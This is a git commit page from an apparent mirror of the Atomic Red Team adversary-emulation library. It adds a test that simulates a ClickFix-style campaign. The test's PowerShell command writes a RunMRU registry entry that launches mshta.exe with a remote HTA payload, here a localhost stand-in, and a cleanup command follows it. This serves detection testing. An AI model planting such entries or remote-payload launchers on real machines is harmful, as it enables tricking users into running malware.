security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generated docs from job=generate-docs branch=master [ci skip]

Browse Source
This commit is contained in:
Atomic Red Team doc generator
2025-07-18 13:21:31 +00:00
parent 858a035852
commit a126a1898a
10 changed files with 74 additions and 3 deletions
Download Patch File Download Diff File Expand all files Collapse all files
README.md
+1 -1
View File
@@ -2,7 +2,7 @@
# Atomic Red Team
![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1731-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1732-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
Atomic Red Team™ is a library of tests mapped to the
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
+1 -1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
+1 -1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Indexes-CSV/index.csv
+1
View File
@@ -1003,6 +1003,7 @@ execution,T1204.002,User Execution: Malicious File,8,Potentially Unwanted Applic
execution,T1204.002,User Execution: Malicious File,9,Office Generic Payload Download,5202ee05-c420-4148-bf5e-fd7f7d24850c,powershell
execution,T1204.002,User Execution: Malicious File,10,LNK Payload Download,581d7521-9c4b-420e-9695-2aec5241167f,powershell
execution,T1204.002,User Execution: Malicious File,11,Mirror Blast Emulation,24fd9719-7419-42dd-bce6-ab3463110b3c,powershell
execution,T1204.002,User Execution: Malicious File,12,ClickFix Campaign - Abuse RunMRU to Launch mshta via PowerShell,3f3120f0-7e50-4be2-88ae-54c61230cb9f,powershell
execution,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,sh
execution,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
execution,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /etc/cron.d folder,078e69eb-d9fb-450e-b9d0-2e118217c846,sh
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
1003 execution T1204.002 User Execution: Malicious File 9 Office Generic Payload Download 5202ee05-c420-4148-bf5e-fd7f7d24850c powershell
1004 execution T1204.002 User Execution: Malicious File 10 LNK Payload Download 581d7521-9c4b-420e-9695-2aec5241167f powershell
1005 execution T1204.002 User Execution: Malicious File 11 Mirror Blast Emulation 24fd9719-7419-42dd-bce6-ab3463110b3c powershell
1006 execution T1204.002 User Execution: Malicious File 12 ClickFix Campaign - Abuse RunMRU to Launch mshta via PowerShell 3f3120f0-7e50-4be2-88ae-54c61230cb9f powershell
1007 execution T1053.003 Scheduled Task/Job: Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 sh
1008 execution T1053.003 Scheduled Task/Job: Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
1009 execution T1053.003 Scheduled Task/Job: Cron 3 Cron - Add script to /etc/cron.d folder 078e69eb-d9fb-450e-b9d0-2e118217c846 sh
atomics/Indexes/Indexes-CSV/windows-index.csv
+1
View File
@@ -698,6 +698,7 @@ execution,T1204.002,User Execution: Malicious File,8,Potentially Unwanted Applic
execution,T1204.002,User Execution: Malicious File,9,Office Generic Payload Download,5202ee05-c420-4148-bf5e-fd7f7d24850c,powershell
execution,T1204.002,User Execution: Malicious File,10,LNK Payload Download,581d7521-9c4b-420e-9695-2aec5241167f,powershell
execution,T1204.002,User Execution: Malicious File,11,Mirror Blast Emulation,24fd9719-7419-42dd-bce6-ab3463110b3c,powershell
execution,T1204.002,User Execution: Malicious File,12,ClickFix Campaign - Abuse RunMRU to Launch mshta via PowerShell,3f3120f0-7e50-4be2-88ae-54c61230cb9f,powershell
execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt
execution,T1106,Native API,2,WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique,ce4e76e6-de70-4392-9efe-b281fc2b4087,powershell
execution,T1106,Native API,3,WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique,7ec5b74e-8289-4ff2-a162-b6f286a33abd,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
698 execution T1204.002 User Execution: Malicious File 9 Office Generic Payload Download 5202ee05-c420-4148-bf5e-fd7f7d24850c powershell
699 execution T1204.002 User Execution: Malicious File 10 LNK Payload Download 581d7521-9c4b-420e-9695-2aec5241167f powershell
700 execution T1204.002 User Execution: Malicious File 11 Mirror Blast Emulation 24fd9719-7419-42dd-bce6-ab3463110b3c powershell
701 execution T1204.002 User Execution: Malicious File 12 ClickFix Campaign - Abuse RunMRU to Launch mshta via PowerShell 3f3120f0-7e50-4be2-88ae-54c61230cb9f powershell
702 execution T1106 Native API 1 Execution through API - CreateProcess 99be2089-c52d-4a4a-b5c3-261ee42c8b62 command_prompt
703 execution T1106 Native API 2 WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique ce4e76e6-de70-4392-9efe-b281fc2b4087 powershell
704 execution T1106 Native API 3 WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique 7ec5b74e-8289-4ff2-a162-b6f286a33abd powershell
atomics/Indexes/Indexes-Markdown/index.md
+1
View File
@@ -1334,6 +1334,7 @@
- Atomic Test #9: Office Generic Payload Download [windows]
- Atomic Test #10: LNK Payload Download [windows]
- Atomic Test #11: Mirror Blast Emulation [windows]
- Atomic Test #12: ClickFix Campaign - Abuse RunMRU to Launch mshta via PowerShell [windows]
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
atomics/Indexes/Indexes-Markdown/windows-index.md
+1
View File
@@ -945,6 +945,7 @@
- Atomic Test #9: Office Generic Payload Download [windows]
- Atomic Test #10: LNK Payload Download [windows]
- Atomic Test #11: Mirror Blast Emulation [windows]
- Atomic Test #12: ClickFix Campaign - Abuse RunMRU to Launch mshta via PowerShell [windows]
- T1559.001 Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1106 Native API](../../T1106/T1106.md)
atomics/Indexes/index.yaml
+15
View File
@@ -53543,6 +53543,21 @@ execution:
cleanup_command: reg delete "HKCU\SOFTWARE\Microsoft\Office\16.0\Excel\Security"
/v "VBAWarnings" /f
name: powershell
- name: ClickFix Campaign - Abuse RunMRU to Launch mshta via PowerShell
auto_generated_guid: 3f3120f0-7e50-4be2-88ae-54c61230cb9f
description: |
Simulates a ClickFix-style campaign by adding a malicious entry to the RunMRU registry key that launches `mshta.exe` with a remote payload.
This technique relies on user interaction (Win+R + Enter) to trigger execution.
Used in social engineering campaigns that aim to bypass traditional startup methods.
Reference: https://www.netskope.com/blog/lumma-stealer-fake-captchas-new-techniques-to-evade-detection
supported_platforms:
- windows
executor:
command: Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
-Name "atomictest" -Value '"C:\Windows\System32\mshta.exe" http://localhost/hello6.hta'
cleanup_command: Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
-Name "atomictest" -ErrorAction SilentlyContinue
name: powershell
T1053.003:
technique:
type: attack-pattern
atomics/Indexes/windows-index.yaml
+15
View File
@@ -44339,6 +44339,21 @@ execution:
cleanup_command: reg delete "HKCU\SOFTWARE\Microsoft\Office\16.0\Excel\Security"
/v "VBAWarnings" /f
name: powershell
- name: ClickFix Campaign - Abuse RunMRU to Launch mshta via PowerShell
auto_generated_guid: 3f3120f0-7e50-4be2-88ae-54c61230cb9f
description: |
Simulates a ClickFix-style campaign by adding a malicious entry to the RunMRU registry key that launches `mshta.exe` with a remote payload.
This technique relies on user interaction (Win+R + Enter) to trigger execution.
Used in social engineering campaigns that aim to bypass traditional startup methods.
Reference: https://www.netskope.com/blog/lumma-stealer-fake-captchas-new-techniques-to-evade-detection
supported_platforms:
- windows
executor:
command: Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
-Name "atomictest" -Value '"C:\Windows\System32\mshta.exe" http://localhost/hello6.hta'
cleanup_command: Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
-Name "atomictest" -ErrorAction SilentlyContinue
name: powershell
T1053.003:
technique:
type: attack-pattern
atomics/T1204.002/T1204.002.md
+37
View File
@@ -34,6 +34,8 @@ While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently
- [Atomic Test #11 - Mirror Blast Emulation](#atomic-test-11---mirror-blast-emulation)
- [Atomic Test #12 - ClickFix Campaign - Abuse RunMRU to Launch mshta via PowerShell](#atomic-test-12---clickfix-campaign---abuse-runmru-to-launch-mshta-via-powershell)
<br/>
@@ -671,4 +673,39 @@ reg delete "HKCU\SOFTWARE\Microsoft\Office\16.0\Excel\Security" /v "VBAWarnings"
<br/>
<br/>
## Atomic Test #12 - ClickFix Campaign - Abuse RunMRU to Launch mshta via PowerShell
Simulates a ClickFix-style campaign by adding a malicious entry to the RunMRU registry key that launches `mshta.exe` with a remote payload.
This technique relies on user interaction (Win+R + Enter) to trigger execution.
Used in social engineering campaigns that aim to bypass traditional startup methods.
Reference: https://www.netskope.com/blog/lumma-stealer-fake-captchas-new-techniques-to-evade-detection
**Supported Platforms:** Windows
**auto_generated_guid:** 3f3120f0-7e50-4be2-88ae-54c61230cb9f
#### Attack Commands: Run with `powershell`!
```powershell
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "atomictest" -Value '"C:\Windows\System32\mshta.exe" http://localhost/hello6.hta'
```
#### Cleanup Commands:
```powershell
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "atomictest" -ErrorAction SilentlyContinue
```
<br/>